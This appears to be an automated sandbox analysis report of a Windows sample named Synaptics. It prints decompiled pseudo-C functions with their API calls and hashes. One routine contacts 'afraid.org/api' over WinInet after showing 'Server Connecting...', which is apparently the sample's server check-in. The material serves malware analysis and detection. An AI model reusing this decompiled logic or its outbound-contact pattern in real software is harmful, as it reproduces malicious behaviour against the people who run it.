                                                                                                                                                                                                                            				_push(_t88);
                                                                                                                                                                                                                            				_push(0x41dcc1);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t90;
                                                                                                                                                                                                                            				if(_a8 != 0xffff) {
                                                                                                                                                                                                                            					E0041DA90(E004098C4(_t86, _t84 & 0x0000ffff), 0);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t62 + 4)) < 0) {
                                                                                                                                                                                                                            						E00409E98(_t86,  &_v36);
                                                                                                                                                                                                                            						_v24 = _v36;
                                                                                                                                                                                                                            						_v20 = 0xb;
                                                                                                                                                                                                                            						E0040C918(GetLastError(),  &_v40);
                                                                                                                                                                                                                            						_v16 = _v40;
                                                                                                                                                                                                                            						_v12 = 0xb;
                                                                                                                                                                                                                            						_t67 =  *0x49d6c8; // 0x417484
                                                                                                                                                                                                                            						E0040D23C(_t62, _t67, 1, _t84, _t86, 1,  &_v24);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E0041DA90(E00409940(), 0);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t62 + 4)) < 0) {
                                                                                                                                                                                                                            						E00409E98(_t86,  &_v28);
                                                                                                                                                                                                                            						_v24 = _v28;
                                                                                                                                                                                                                            						_v20 = 0xb;
                                                                                                                                                                                                                            						E0040C918(GetLastError(),  &_v32);
                                                                                                                                                                                                                            						_v16 = _v32;
                                                                                                                                                                                                                            						_v12 = 0xb;
                                                                                                                                                                                                                            						_t69 =  *0x49de3c; // 0x41747c
                                                                                                                                                                                                                            						E0040D23C(_t62, _t69, 1, _t84, _t86, 1,  &_v24); // executed
                                                                                                                                                                                                                            						E00404378(); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t73);
                                                                                                                                                                                                                            				 *[fs:eax] = _t73;
                                                                                                                                                                                                                            				_push(E0041DCC8);
                                                                                                                                                                                                                            				return E004049E4( &_v40, 4);
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC0D
                                                                                                                                                                                                                              • Part of subcall function 004098C4: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00418E54,0041DC4D,00000000,0041DCC1,?,00000000,00418E54), ref: 00409912
                                                                                                                                                                                                                              • Part of subcall function 00409E98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000000,00418E54,0041DC68,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409EB7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC72
                                                                                                                                                                                                                              • Part of subcall function 0040C918: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFileFormatFullMessageNamePath
                                                                                                                                                                                                                            • String ID: |tA
                                                                                                                                                                                                                            • API String ID: 1652710734-3894576594
                                                                                                                                                                                                                            • Opcode ID: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                                                            • Instruction ID: cf494aa496f929f16128ea2aa2fb3604e401f875384fb3819420099628f7d97d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D3181B0E046058FCB00EFA6C8816EEB7B1AB49304F50857AE904B7391D7785E45CBAA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E004787F4(intOrPtr* __eax, intOrPtr __ecx, char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr* _v20;
                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                            				short* _v28;
                                                                                                                                                                                                                            				intOrPtr* _v32;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr* _t57;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				short* _t75;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_v32 = __eax;
                                                                                                                                                                                                                            				_t62 = _v8;
                                                                                                                                                                                                                            				_t70 = 0;
                                                                                                                                                                                                                            				_v12 = _t74;
                                                                                                                                                                                                                            				_t75 = _t74 - (_v16 + 1 << 2);
                                                                                                                                                                                                                            				_v20 = _t75;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_t71 = E00409F88(_t62, _t70);
                                                                                                                                                                                                                            					_v24 = MultiByteToWideChar(0, 0, _t62, _t71, 0, 0) + 1;
                                                                                                                                                                                                                            					_t75 = _t75 - (_v24 + _v24 + 0x00000003 & 0xfffffffc);
                                                                                                                                                                                                                            					_v28 = _t75;
                                                                                                                                                                                                                            					if(_t70 != 0) {
                                                                                                                                                                                                                            						_t47 = _v16 - _t70;
                                                                                                                                                                                                                            						__eflags = _t47;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v20 + _t47 * 4)) = _v28;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_v20 = _v28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					MultiByteToWideChar(0, 0, _t62, _t71, _v28, _v24);
                                                                                                                                                                                                                            					_t68 = _v24;
                                                                                                                                                                                                                            					 *((short*)(_v28 + _v24 * 2 - 2)) = 0;
                                                                                                                                                                                                                            					_t62 =  &(_t62[_t71 + 1]);
                                                                                                                                                                                                                            					_t70 = _t70 + 1;
                                                                                                                                                                                                                            				} while (_t70 != _v16);
                                                                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                                                                            				_push(GetThreadLocale());
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				_push(_v20);
                                                                                                                                                                                                                            				_t56 =  *0x49d770; // 0x49b500
                                                                                                                                                                                                                            				_push(_t56);
                                                                                                                                                                                                                            				_t57 = _v32;
                                                                                                                                                                                                                            				_push(_t57);
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *_t57 + 0x14))() != 0x80020006) {
                                                                                                                                                                                                                            					_t60 = E004781BC(_t59, _t68, __eflags);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t60 = E004787C0(_t73);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t60;
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 0047882F
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478874
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$LocaleThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4086549855-0
                                                                                                                                                                                                                            • Opcode ID: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                                                            • Instruction ID: a51c77bdc8ed0243a2616cf9538eba40c564d6da85687872f4e0f106e925e268
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B310DB1E40209AFCB10DB99CC86BAFBBF8EF59310F10415AF518E7391D634AD018BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E0040408A(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				struct _EXCEPTION_RECORD* _t22;
                                                                                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                            				long _t30;
                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t48 = __ebp;
                                                                                                                                                                                                                            				_t47 = __esi;
                                                                                                                                                                                                                            				_t45 = __edi;
                                                                                                                                                                                                                            				_t33 = __ebx;
                                                                                                                                                                                                                            				_t22 = _a4.ExceptionRecord;
                                                                                                                                                                                                                            				if((_t22->ExceptionFlags & 0x00000006) == 0) {
                                                                                                                                                                                                                            					_t41 = _t22->ExceptionInformation[1];
                                                                                                                                                                                                                            					_t38 = _t22->ExceptionInformation;
                                                                                                                                                                                                                            					if(_t22->ExceptionCode == 0xeedfade) {
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						if( *0x49b030 <= 1 ||  *0x49b02c > 0) {
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t28 = UnhandledExceptionFilter( &_a4);
                                                                                                                                                                                                                            						_t38 = _t38;
                                                                                                                                                                                                                            						_t41 = _t41;
                                                                                                                                                                                                                            						_t22 = _t22;
                                                                                                                                                                                                                            						if(_t28 != 0) {
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						asm("cld");
                                                                                                                                                                                                                            						E00403B20(_t22);
                                                                                                                                                                                                                            						_t43 =  *0x49e010; // 0x40d76c
                                                                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                                                                            							_t30 =  *_t43();
                                                                                                                                                                                                                            							if(_t30 != 0) {
                                                                                                                                                                                                                            								_t44 = _a12;
                                                                                                                                                                                                                            								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
                                                                                                                                                                                                                            									L10:
                                                                                                                                                                                                                            									_t41 = _t30;
                                                                                                                                                                                                                            									_t22 = _a4.ExceptionRecord;
                                                                                                                                                                                                                            									_t38 = _t22->ExceptionAddress;
                                                                                                                                                                                                                            									goto L11;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t30 = E00403FA4(_t30, _t44, __edi);
                                                                                                                                                                                                                            									if( *0x49b030 <= 0 ||  *0x49b02c > 0) {
                                                                                                                                                                                                                            										goto L10;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t31 = UnhandledExceptionFilter( &_a4);
                                                                                                                                                                                                                            										_t32 = _t30;
                                                                                                                                                                                                                            										if(_t31 != 0) {
                                                                                                                                                                                                                            											_t41 = _t32;
                                                                                                                                                                                                                            											_t22 = _a4.ExceptionRecord;
                                                                                                                                                                                                                            											_t38 = _t22->ExceptionAddress;
                                                                                                                                                                                                                            											L14:
                                                                                                                                                                                                                            											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
                                                                                                                                                                                                                            											 *0x49e018(_a8, "true", _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33); // executed
                                                                                                                                                                                                                            											_t46 = _v8;
                                                                                                                                                                                                                            											_t25 = E00406CDC();
                                                                                                                                                                                                                            											_push( *_t25);
                                                                                                                                                                                                                            											 *_t25 = _t50;
                                                                                                                                                                                                                            											 *((intOrPtr*)(_v8 + 4)) = E00404190;
                                                                                                                                                                                                                            											E00403FF4(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
                                                                                                                                                                                                                            											goto __ebx;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x004040ff
                                                                                                                                                                                                                            0x004040e5
                                                                                                                                                                                                                            0x004040d7
                                                                                                                                                                                                                            0x004040c3
                                                                                                                                                                                                                            0x004040b9
                                                                                                                                                                                                                            0x004040a9
                                                                                                                                                                                                                            0x004041b5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004040F6
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000408C), ref: 00404133
                                                                                                                                                                                                                            • RtlUnwind.KERNEL32(?,?,Function_0000408C,00000000,?,?,Function_0000408C,?), ref: 0040415E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$Unwind
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1141220122-0
                                                                                                                                                                                                                            • Opcode ID: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                                                            • Instruction ID: 064ae43801aa42ded6184c294ad0f6d3c4b4e8b690226dbcba8ce268034621ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E3134B0604200AFD720DB15D989F277BE9EBD8714F19857AF6049B391D778EC80C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00495930(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                            				intOrPtr* _t16;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t61 = _t62;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_push(_t61);
                                                                                                                                                                                                                            				_push(0x495b6e);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t62;
                                                                                                                                                                                                                            				Sleep(0x3e8); // executed
                                                                                                                                                                                                                            				if(E00474D34(0) == 0) {
                                                                                                                                                                                                                            					_t11 =  *0x49f134; // 0x21e41d4
                                                                                                                                                                                                                            					E0042F70C(_t11, 1);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t16 =  *0x49dbdc; // 0x49f13c
                                                                                                                                                                                                                            					E004967D4( *_t16, __ebx, "Server Connecting...");
                                                                                                                                                                                                                            					_push(_t61);
                                                                                                                                                                                                                            					_push(0x495a09);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t62;
                                                                                                                                                                                                                            					_t50 =  *0x49f118; // 0x21e2f48
                                                                                                                                                                                                                            					_t21 = E00404FC4("afraid.org/api", _t50);
                                                                                                                                                                                                                            					_t65 = _t21;
                                                                                                                                                                                                                            					if(_t21 != 0) {
                                                                                                                                                                                                                            						_t30 =  *0x49f118; // 0x21e2f48
                                                                                                                                                                                                                            						E00474FC0(_t30, __ebx,  &_v12, __esi);
                                                                                                                                                                                                                            						E00475110(_v12, __ebx, 1, 0x7c, __edi, __esi, _t65,  &_v8);
                                                                                                                                                                                                                            						E00404A14(0x49f118, _v8);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t22 =  *0x49f114; // 0x21e4244
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t22 + 0x88))();
                                                                                                                                                                                                                            					_t24 =  *0x49f114; // 0x21e4244
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t24 + 0x8c))();
                                                                                                                                                                                                                            					_t26 =  *0x49f114; // 0x21e4244
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t26 + 0x94))();
                                                                                                                                                                                                                            					_pop(_t54);
                                                                                                                                                                                                                            					 *[fs:eax] = _t54;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t47);
                                                                                                                                                                                                                            				 *[fs:eax] = _t47;
                                                                                                                                                                                                                            				_push(E00495B75);
                                                                                                                                                                                                                            				return E004049E4( &_v28, 6);
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            0x004959dc
                                                                                                                                                                                                                            0x004959e3
                                                                                                                                                                                                                            0x004959ef
                                                                                                                                                                                                                            0x004959f6
                                                                                                                                                                                                                            0x004959fe
                                                                                                                                                                                                                            0x00495a01
                                                                                                                                                                                                                            0x00495a01
                                                                                                                                                                                                                            0x00495b55
                                                                                                                                                                                                                            0x00495b58
                                                                                                                                                                                                                            0x00495b5b
                                                                                                                                                                                                                            0x00495b6d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000000,00495B6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00495951
                                                                                                                                                                                                                              • Part of subcall function 00474D34: InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$Open$CloseConnectedFileHandleReadSleepState
                                                                                                                                                                                                                            • String ID: Server Connecting...$afraid.org/api
                                                                                                                                                                                                                            • API String ID: 484477557-4171305320
                                                                                                                                                                                                                            • Opcode ID: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                                                            • Instruction ID: 1742280dbad9834e3b98c72a481cfe9cad1f0a6ad81f0c4a7812aa737afa5612
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0219074300600DFD701DB65E853D5A3BA5EB89314B61807BF800C7792DA39AC09CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E004034E8(void** __eax, void* __ecx, void* __edx) {
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                            				void** _t22;
                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t37 = __edx;
                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                            				_t22 = __eax;
                                                                                                                                                                                                                            				if(0xffffffffffff2850 == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t22[1] = 0xd7b3;
                                                                                                                                                                                                                            					_t22[2] = _t37;
                                                                                                                                                                                                                            					_t22[9] = 0x4034c0;
                                                                                                                                                                                                                            					_t22[7] = E00402D00;
                                                                                                                                                                                                                            					if(_t22[0x12] == 0) {
                                                                                                                                                                                                                            						_t22[9] = E00402D00;
                                                                                                                                                                                                                            						if(_t33 == 3) {
                                                                                                                                                                                                                            							_t15 = GetStdHandle(0xfffffff5);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t15 = GetStdHandle(0xfffffff6);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t18 = 0xc0000000;
                                                                                                                                                                                                                            						_t29 =  *0x49b00c; // 0x0
                                                                                                                                                                                                                            						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x49b06c);
                                                                                                                                                                                                                            						_t24 = 2;
                                                                                                                                                                                                                            						_t34 = _t33 - 3;
                                                                                                                                                                                                                            						if(_t34 != 0) {
                                                                                                                                                                                                                            							_t24 = 3;
                                                                                                                                                                                                                            							_t35 = _t34 + 1;
                                                                                                                                                                                                                            							if(_t35 != 0) {
                                                                                                                                                                                                                            								_t18 = 0x40000000;
                                                                                                                                                                                                                            								_t22[1] = 0xd7b2;
                                                                                                                                                                                                                            								if(_t35 + 1 != 0) {
                                                                                                                                                                                                                            									_t18 = 0x80000000;
                                                                                                                                                                                                                            									_t22[1] = 0xd7b1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t15 = CreateFileA( &(_t22[0x12]), _t18, _t32, 0, _t24, 0x80, 0); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                            						_t22[1] = 0xd7b0;
                                                                                                                                                                                                                            						_t16 = GetLastError();
                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                            						return E004028E4(_t16);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t22 = _t15;
                                                                                                                                                                                                                            						return _t15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(0xffffffffffff2850 > 3) {
                                                                                                                                                                                                                            					_t16 = 0x66;
                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
                                                                                                                                                                                                                            					E004028E4(_t20);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            0x00403552
                                                                                                                                                                                                                            0x00403557
                                                                                                                                                                                                                            0x00403558
                                                                                                                                                                                                                            0x0040355a
                                                                                                                                                                                                                            0x00403560
                                                                                                                                                                                                                            0x00403566
                                                                                                                                                                                                                            0x00403568
                                                                                                                                                                                                                            0x0040356d
                                                                                                                                                                                                                            0x0040356d
                                                                                                                                                                                                                            0x00403566
                                                                                                                                                                                                                            0x00403558
                                                                                                                                                                                                                            0x00403583
                                                                                                                                                                                                                            0x00403583
                                                                                                                                                                                                                            0x0040358b
                                                                                                                                                                                                                            0x004035b1
                                                                                                                                                                                                                            0x004035b7
                                                                                                                                                                                                                            0x004035bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x0040358b
                                                                                                                                                                                                                            0x00403502
                                                                                                                                                                                                                            0x004035aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035aa
                                                                                                                                                                                                                            0x0040350d
                                                                                                                                                                                                                            0x0040350f
                                                                                                                                                                                                                            0x0040350f
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000), ref: 00403583
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035A3
                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035B7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
